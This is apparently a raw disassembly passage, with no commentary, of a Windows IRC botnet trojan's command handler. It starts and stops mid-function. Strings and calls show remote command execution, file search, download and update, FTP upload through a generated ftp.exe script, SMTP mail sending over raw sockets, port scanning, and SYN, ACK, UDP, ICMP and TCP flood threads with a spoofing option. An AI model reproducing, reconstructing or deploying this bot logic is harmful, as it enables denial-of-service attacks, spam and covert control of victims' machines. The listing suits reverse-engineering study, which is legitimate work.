loc_40E626: ; CODE XREF: sub_40C50A+20D5�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A48F
add esp, 10h
test eax, eax
jz short loc_40E649
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40E752
; ---------------------------------------------------------------------------
loc_40E649: ; CODE XREF: sub_40C50A+2133�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40E752
; ---------------------------------------------------------------------------
loc_40E653: ; CODE XREF: sub_40C50A+20D0�j
push edi
push offset aUser_2 ; "user"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E705
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40E6DE
cmp [ebp+var_9C4], bl
jz short loc_40E694
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
call sub_40A5B0
push eax
push offset aS_20 ; "%s"
jmp short loc_40E6CA
; ---------------------------------------------------------------------------
loc_40E694: ; CODE XREF: sub_40C50A+216B�j
push [ebp+var_4]
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_40E6BB
push esi
push eax
push ebx
call sub_40A5B0
push eax
push offset aS_21 ; "%s"
jmp short loc_40E6CA
; ---------------------------------------------------------------------------
loc_40E6BB: ; CODE XREF: sub_40C50A+219F�j
push ebx
push eax
push 2
call sub_40A5B0
push eax
push offset aS_22 ; "%s"
loc_40E6CA: ; CODE XREF: sub_40C50A+2188�j
; sub_40C50A+21AF�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 24h
jmp loc_40E760
; ---------------------------------------------------------------------------
loc_40E6DE: ; CODE XREF: sub_40C50A+2163�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40AAC4
add esp, 10h
test eax, eax
jz short loc_40E6FE
push offset aNetUserListCom ; "[NET]: User list completed."
jmp short loc_40E752
; ---------------------------------------------------------------------------
loc_40E6FE: ; CODE XREF: sub_40C50A+21EB�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp short loc_40E752
; ---------------------------------------------------------------------------
loc_40E705: ; CODE XREF: sub_40C50A+2158�j
push edi
push offset aSend_1 ; "send"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E74D
cmp [ebp+arg_18], ebx
jz short loc_40E746
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40AD78
push eax
lea eax, [ebp+var_2DC]
push offset aS_23 ; "%s"
push eax
call sub_418D70
add esp, 1Ch
jmp short loc_40E760
; ---------------------------------------------------------------------------
loc_40E746: ; CODE XREF: sub_40C50A+220F�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_40E752
; ---------------------------------------------------------------------------
loc_40E74D: ; CODE XREF: sub_40C50A+220A�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_40E752: ; CODE XREF: sub_40C50A+1F99�j
; sub_40C50A+201D�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
loc_40E760: ; CODE XREF: sub_40C50A+1FA1�j
; sub_40C50A+1FFB�j ...
cmp [ebp+var_8], ebx
jnz short loc_40E781
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_40E781: ; CODE XREF: sub_40C50A+2259�j
; sub_40C50A+4864�j ...
mov esi, [ebp+arg_24]
loc_40E784: ; CODE XREF: sub_40C50A+935�j
; sub_40C50A+4B3F�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
pop ecx
mov eax, esi
jmp loc_40C97F
; ---------------------------------------------------------------------------
loc_40E798: ; CODE XREF: sub_40C50A+1F7E�j
push [ebp+arg_8]
push offset aCapture ; "capture"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410AB6
push [ebp+arg_8]
push offset aCap ; "cap"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410AB6
push [ebp+arg_8]
push offset aGethost ; "gethost"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4109D2
push [ebp+arg_8]
push offset aGh ; "gh"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4109D2
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40C97C
push [ebp+arg_8]
push offset aAddalias ; "addalias"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410996
push [ebp+arg_8]
push offset aAa ; "aa"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410996
push [ebp+arg_8]
push offset aPrivmsg_2 ; "privmsg"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410943
push [ebp+arg_8]
push offset aPm_0 ; "pm"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410943
push [ebp+arg_8]
push offset aAction ; "action"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4108D5
push [ebp+arg_8]
push offset aA_1 ; "a"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4108D5
push [ebp+arg_8]
push offset aCycle ; "cycle"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410872
push [ebp+arg_8]
push offset aCy ; "cy"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410872
push [ebp+arg_8]
push offset aMode ; "mode"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410833
push [ebp+arg_8]
push offset aM ; "m"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410833
push [ebp+arg_8]
push offset aC_raw ; "c_raw"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4107C8
push [ebp+arg_8]
push offset aC_r ; "c_r"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4107C8
push [ebp+arg_8]
push offset aC_mode ; "c_mode"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410746
push [ebp+arg_8]
push offset aC_m ; "c_m"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410746
push [ebp+arg_8]
push offset aC_nick ; "c_nick"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4106D5
push [ebp+arg_8]
push offset aC_n ; "c_n"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4106D5
push [ebp+arg_8]
push offset aC_join ; "c_join"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410689
push [ebp+arg_8]
push offset aC_j ; "c_j"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410689
push [ebp+arg_8]
push offset aC_part ; "c_part"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410626
push [ebp+arg_8]
push offset aC_p ; "c_p"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410626
push [ebp+arg_8]
push offset aRepeat ; "repeat"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410560
push [ebp+arg_8]
push offset aRp ; "rp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410560
push [ebp+arg_8]
push offset aDelay ; "delay"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4104C5
push [ebp+arg_8]
push offset aDe ; "de"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4104C5
push [ebp+arg_8]
push offset aFalehupd ; "falehupd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410347
push [ebp+arg_8]
push offset aUfalehupdp ; "ufalehupdp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410347
push [ebp+arg_8]
push offset aExecute ; "execute"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4102B4
push [ebp+arg_8]
push offset aE ; "e"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4102B4
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4101B6
push [ebp+arg_8]
push offset aFf_0 ; "ff"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4101B6
push [ebp+arg_8]
push offset aRename ; "rename"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410162
push [ebp+arg_8]
push offset aMv ; "mv"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410162
push [ebp+arg_8]
push offset aIcmpflood ; "icmpflood"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410067
push [ebp+arg_8]
push offset aIcmp ; "icmp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410067
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40C97C
push [ebp+arg_8]
push offset aClone_0 ; "clone"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FF7C
push [ebp+arg_8]
push offset aC ; "c"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FF7C
push [ebp+arg_8]
push offset aDdos_syn_0 ; "ddos.syn"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FE77
push [ebp+arg_8]
push offset aDdos_ack_0 ; "ddos.ack"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FE77
push [ebp+arg_8]
push offset aDdos_random_0 ; "ddos.random"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FE77
push [ebp+arg_8]
push offset aSynflood ; "synflood"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FD79
push [ebp+arg_8]
push offset aSyn_0 ; "syn"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FD79
push [ebp+arg_8]
push offset aFalehdownl ; "falehdownl"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FC3B
push [ebp+arg_8]
push offset aFalehdownl2 ; "falehdownl2"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FC3B
push [ebp+arg_8]
push offset aRedirect_0 ; "redirect"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FB41
push [ebp+arg_8]
push offset aRd ; "rd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FB41
push [ebp+arg_8]
push offset aScan_1 ; "scan"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FA4E
push [ebp+arg_8]
push offset aSc ; "sc"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40FA4E
push [ebp+arg_8]
push offset aC_privmsg ; "c_privmsg"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F979
push [ebp+arg_8]
push offset aC_pm ; "c_pm"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F979
push [ebp+arg_8]
push offset aC_action ; "c_action"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F864
push [ebp+arg_8]
push offset aC_a ; "c_a"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F864
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40C97C
push [ebp+arg_8]
push offset aFofofo ; "fofofo"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F505
push [ebp+arg_8]
push offset aF0f0f0 ; "f0f0f0"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F505
push [ebp+arg_8]
push offset aUdpflood ; "udpflood"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F3E5
push [ebp+arg_8]
push offset aUdp ; "udp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F3E5
push [ebp+arg_8]
push offset aU ; "u"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F3E5
push [ebp+arg_8]
push offset aPingflood ; "pingflood"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F2B2
push [ebp+arg_8]
push offset aPing_1 ; "ping"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F2B2
push [ebp+arg_8]
push offset aP ; "p"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F2B2
push [ebp+arg_8]
push offset aTcpflood ; "tcpflood"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F11F
push [ebp+arg_8]
push offset aTcp ; "tcp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F11F
push [ebp+arg_8]
push offset aEmail ; "email"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40EF20
lea eax, [ebp+var_3F8]
push edi
push eax
call sub_419FA0
push [ebp+arg_18]
call sub_4195F0
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_DB0]
push eax
call sub_419FA0
push [ebp+arg_10]
lea eax, [ebp+var_BA8]
push eax
call sub_419FA0
push offset asc_441708 ; " "
push offset a__2 ; "_"
push [ebp+esi+var_80]
call sub_409842
push eax
lea eax, [ebp+var_55C]
push eax
call sub_419FA0
add esp, 30h
lea eax, [ebp+var_6EC]
push eax
push 101h
call dword_44B638 ; WSAStartup
lea eax, [ebp+var_3F8]
push eax
call dword_44B744 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_44B740 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_2EC], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2E8], eax
call dword_44B6C0 ; htons
mov [ebp+var_2EA], ax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_BA8]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_15B0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_418D70
add esp, 1Ch
lea eax, [ebp+var_2EC]
push 10h
push eax
push esi
call dword_44B668 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call dword_44B6D8 ; recv
lea eax, [ebp+var_CAC]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_15B0]
push eax
push esi
call dword_44B710 ; send
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call dword_44B6D8 ; recv
push esi
call dword_44B758 ; closesocket
call dword_44B620 ; WSACleanup
lea eax, [ebp+var_BA8]
push eax
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
loc_40EF0C: ; CODE XREF: sub_40C50A+3B58�j
; sub_40C50A+3E38�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
jmp loc_41110A
; ---------------------------------------------------------------------------
loc_40EF20: ; CODE XREF: sub_40C50A+28AC�j
push [ebp+arg_8]
push offset aHttpcon ; "httpcon"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F0F1
push [ebp+arg_8]
push offset aHcon ; "hcon"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_40F0F1
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40C97C
push [ebp+arg_8]
push offset aUpload ; "upload"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_41263B
push 4
push esi
call sub_405593
pop ecx
test eax, eax
pop ecx
jnz short loc_40EFC6
push esi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40EF85: ; CODE XREF: sub_40C50A+2D99�j
; sub_40C50A+3355�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
loc_40EF94: ; CODE XREF: sub_40C50A+2D7D�j
; sub_40C50A+3339�j ...
cmp [ebp+var_8], ebx
jnz short loc_40EFB5
push ebx
push [ebp+var_4]
loc_40EF9D: ; CODE XREF: sub_40C50A+3968�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_40EFAD: ; CODE XREF: sub_40C50A+5687�j
call sub_40842D
add esp, 14h
loc_40EFB5: ; CODE XREF: sub_40C50A+2A8D�j
; sub_40C50A+2ECC�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
jmp loc_4127C8
; ---------------------------------------------------------------------------
loc_40EFC6: ; CODE XREF: sub_40C50A+2A73�j
call ds:dword_494308
push eax
call sub_418FF0
pop ecx
call sub_419000
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_419000
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_419000
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_CB0]
push edx
push eax
lea eax, [ebp+var_BAC]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_418D70
lea eax, [ebp+var_BAC]
push offset aAb ; "ab"
push eax
call sub_419D70
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40C97C
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41AD60
push [ebp+arg_24]
call sub_419740
lea eax, [ebp+var_BAC]
push eax
lea eax, [ebp+var_3F8]
push offset aSS_11 ; "-s:%s"
push eax
call sub_418D70
add esp, 2Ch
lea eax, [ebp+var_3F8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen_1 ; "open"
push ebx
call dword_44B634
test eax, eax
push edi
push esi
jz short loc_40F090
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40F095
; ---------------------------------------------------------------------------
loc_40F090: ; CODE XREF: sub_40C50A+2B7D�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40F095: ; CODE XREF: sub_40C50A+2B84�j
call sub_418D70
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40F0BE
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_40F0BE: ; CODE XREF: sub_40C50A+2B96�j
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
loc_40F0CA: ; CODE XREF: sub_40C50A+2BE5�j
lea eax, [ebp+var_BAC]
push 4
push eax
call sub_405593
add esp, 0Ch
test eax, eax
jz loc_40C97C
lea eax, [ebp+var_BAC]
push eax
call sub_41B720
jmp short loc_40F0CA
; ---------------------------------------------------------------------------
loc_40F0F1: ; CODE XREF: sub_40C50A+2A27�j
; sub_40C50A+2A3E�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_4195F0
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_407D34
jmp loc_412638
; ---------------------------------------------------------------------------
loc_40F11F: ; CODE XREF: sub_40C50A+287E�j
; sub_40C50A+2895�j
mov esi, 80h
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_418EF0
lea eax, [ebp+var_678]
push eax
push offset aSyn_1 ; "syn"
call sub_419360
add esp, 14h
test eax, eax
jz short loc_40F182
lea eax, [ebp+var_678]
push eax
push offset aAck ; "ack"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40F182
lea eax, [ebp+var_678]
push eax
push offset aRandom ; "random"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40F182
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_40F182: ; CODE XREF: sub_40C50A+2C3E�j
; sub_40C50A+2C55�j ...
push [ebp+arg_10]
call sub_4195F0
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_40F2A8
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_418EF0
push [ebp+arg_18]
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_418EF0
push [ebp+arg_0]
call sub_4195F0
mov [ebp+var_574], eax
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_418EF0
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_56C], ebx
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40F219
mov eax, offset aNormal ; "Normal"
loc_40F219: ; CODE XREF: sub_40C50A+2D08�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
push ebx
lea eax, [ebp+var_2DC]
push 0Ch
push eax
call sub_4161EB
add esp, 2Ch
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_4157B0
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40F297
loc_40F281: ; CODE XREF: sub_40C50A+2D8B�j
cmp [ebp+var_560], ebx
jnz loc_40EF94
push 32h
call ds:dword_4942D8
jmp short loc_40F281
; ---------------------------------------------------------------------------
loc_40F297: ; CODE XREF: sub_40C50A+2D75�j
call ds:dword_4942F0
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40EF85
; ---------------------------------------------------------------------------
loc_40F2A8: ; CODE XREF: sub_40C50A+2C89�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_40F2B2: ; CODE XREF: sub_40C50A+2839�j
; sub_40C50A+2850�j ...
cmp dword_44B7B0, ebx
mov esi, [ebp+arg_4]
jnz loc_40F3BA
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_4191A0
push [ebp+arg_18]
call sub_4195F0
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4195F0
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_4195F0
push 7Fh
mov [ebp+var_310], eax
push [ebp+var_8C]
lea eax, [ebp+var_418]
push eax
call sub_4191A0
push [ebp+var_310]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 0Eh
push eax
call sub_4161EB
add esp, 48h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B0E5
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40F3A9
loc_40F397: ; CODE XREF: sub_40C50A+2E9D�j
cmp [ebp+var_2FC], ebx
jnz short loc_40F3D3
push 32h
call ds:dword_4942D8
jmp short loc_40F397
; ---------------------------------------------------------------------------
loc_40F3A9: ; CODE XREF: sub_40C50A+2E8B�j
call ds:dword_4942F0
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40FF6B
; ---------------------------------------------------------------------------
loc_40F3BA: ; CODE XREF: sub_40C50A+2DB1�j
push 1FFh
lea eax, [ebp+var_2DC]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_4191A0
loc_40F3D0: ; CODE XREF: sub_40C50A+3A6D�j
add esp, 0Ch
loc_40F3D3: ; CODE XREF: sub_40C50A+2E93�j
; sub_40C50A+2FDA�j ...
cmp [ebp+var_8], ebx
jnz loc_40EFB5
push ebx
push [ebp+var_4]
jmp loc_411B83
; ---------------------------------------------------------------------------
loc_40F3E5: ; CODE XREF: sub_40C50A+27F4�j
; sub_40C50A+280B�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_4191A0
push [ebp+arg_18]
call sub_4195F0
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4195F0
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_4195F0
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_310], eax
jz short loc_40F44A
push esi
call sub_4195F0
pop ecx
mov [ebp+var_30C], eax
jmp short loc_40F450
; ---------------------------------------------------------------------------
loc_40F44A: ; CODE XREF: sub_40C50A+2F2F�j
mov [ebp+var_30C], ebx
loc_40F450: ; CODE XREF: sub_40C50A+2F3E�j
push 7Fh
lea eax, [ebp+var_418]
push [ebp+var_8C]
push eax
call sub_4191A0
push [ebp+var_310]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 0Fh
push eax
call sub_4161EB
add esp, 30h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B271
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40F4F4
loc_40F4DE: ; CODE XREF: sub_40C50A+2FE8�j
cmp [ebp+var_2FC], ebx
jnz loc_40F3D3
push 32h
call ds:dword_4942D8
jmp short loc_40F4DE
; ---------------------------------------------------------------------------
loc_40F4F4: ; CODE XREF: sub_40C50A+2FD2�j
call ds:dword_4942F0
push eax
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
jmp loc_40FF6B
; ---------------------------------------------------------------------------
loc_40F505: ; CODE XREF: sub_40C50A+27C6�j
; sub_40C50A+27DD�j
push 8
call sub_416433
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_4195F0
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 258h
jle short loc_40F558
push [ebp+arg_8]
lea eax, [ebp+var_2DC]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
loc_40F550: ; CODE XREF: sub_40C50A+4487�j
add esp, 20h
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_40F558: ; CODE XREF: sub_40C50A+3017�j
push edi
call sub_4195F0
push [ebp+arg_18]
mov [ebp+var_330], eax
call sub_4195F0
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_4195F0
add esp, 0Ch
cmp eax, 5
mov [ebp+var_32C], eax
jnb short loc_40F591
push 5
pop eax
mov [ebp+var_32C], eax
loc_40F591: ; CODE XREF: sub_40C50A+307C�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40F59E
mov [ebp+var_32C], ecx
loc_40F59E: ; CODE XREF: sub_40C50A+308C�j
push [ebp+arg_10]
call sub_4195F0
mov [ebp+var_328], eax
mov eax, 320h
cmp [ebp+var_328], eax
pop ecx
jbe short loc_40F5C0
mov [ebp+var_328], eax
loc_40F5C0: ; CODE XREF: sub_40C50A+30AE�j
or [ebp+var_314], 0FFFFFFFFh
cmp dword_436158, ebx
mov [ebp+arg_0], ebx
jz short loc_40F616
mov [ebp+arg_24], offset dword_436158
loc_40F5D9: ; CODE XREF: sub_40C50A+30EE�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40F5FC
add [ebp+arg_24], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_40F5D9
jmp short loc_40F616
; ---------------------------------------------------------------------------
loc_40F5FC: ; CODE XREF: sub_40C50A+30E0�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, dword_436158[ecx]
mov [ebp+var_330], ecx
loc_40F616: ; CODE XREF: sub_40C50A+30C6�j
; sub_40C50A+30F0�j
cmp [ebp+var_330], ebx
jnz short loc_40F628
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_40F628: ; CODE XREF: sub_40C50A+3112�j
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_40F663
cmp byte ptr [edi], 23h
jz short loc_40F663
push edi
lea eax, [ebp+var_444]
push 10h
push eax
call sub_418EF0
push 78h
push edi
call sub_4199F0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_304], eax
jmp loc_40F737
; ---------------------------------------------------------------------------
loc_40F663: ; CODE XREF: sub_40C50A+3127�j
; sub_40C50A+312C�j
cmp [ebp+var_9C7], bl
jnz short loc_40F685
cmp [ebp+var_9C6], bl
jnz short loc_40F685
cmp [ebp+var_9B6], bl
jnz short loc_40F685
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_40F685: ; CODE XREF: sub_40C50A+315F�j
; sub_40C50A+3167�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
